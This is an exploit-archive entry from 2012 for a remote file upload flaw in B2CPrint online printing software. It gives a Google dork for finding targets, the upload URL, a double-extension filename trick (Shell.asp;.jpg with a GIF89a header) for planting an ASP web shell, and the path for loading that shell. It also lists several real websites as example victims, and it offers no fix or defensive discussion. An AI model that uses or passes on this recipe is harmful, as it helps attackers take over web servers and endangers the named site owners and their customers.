id: 18868
date: 06/29/2012
title: B2CPrint Remote File Uploader Vulnerability
author: MR.XpR
cves: 

##################################################################

[+] Exploit Title : B2CPrint Remote File Uploader Vulnerability

[+] Google Dork   : inurl:upload.asp intext:B2CPrint Online Printing Solutions

[+] Autor         : Mr.XpR

[+] Resacher Team : IRaNHaCK Security Team

[+] Bug Level     : High (RFU)

[+] Test          : 7 , Linux Back Track

##################################################################


[+]Exploit

   [-] http://www.Site.il/patch/upload.asp

[+]Sh3ll

   [-] Upload Shell Asp ==> Shell.asp;.jpg or Shell.asp;.gif {GIF89a;<%@ LANGUAGE = VBScript.Encode%>};

[+]Load Shell

   [-] http://www.Site.il/patch/files/images/Sh3ll.asp;.jpg

[+]Example :

   [-] http://www.b2cprintshop.com/upload.asp
   [-] http://www.printprint.co.il/upload.asp
   [-] http://www.b2cprint.co.il/collage/EN/upload.asp
   [-] http://www.spektrum.co.il/upload.asp
   [-] More In Google ...



#  0day.today [2023-03-23]  #